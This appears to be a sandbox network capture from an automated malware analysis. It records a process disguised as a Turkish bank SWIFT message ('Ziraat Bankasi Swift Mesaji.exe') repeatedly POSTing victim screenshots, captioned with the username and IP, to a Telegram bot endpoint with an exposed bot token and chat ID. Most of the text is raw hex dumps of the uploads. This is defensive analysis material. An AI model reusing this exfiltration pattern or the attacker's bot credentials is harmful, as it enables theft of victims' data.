                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:32 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:34 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:34 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.549840149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:37 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1d5c756d9117
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675857
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 35 63 37 35 36 64 39 31 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1d5c756d9117Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:37 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:39 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:39 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.549852149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:42 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1dc3a18d066f
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 63 33 61 31 38 64 30 36 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1dc3a18d066fContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 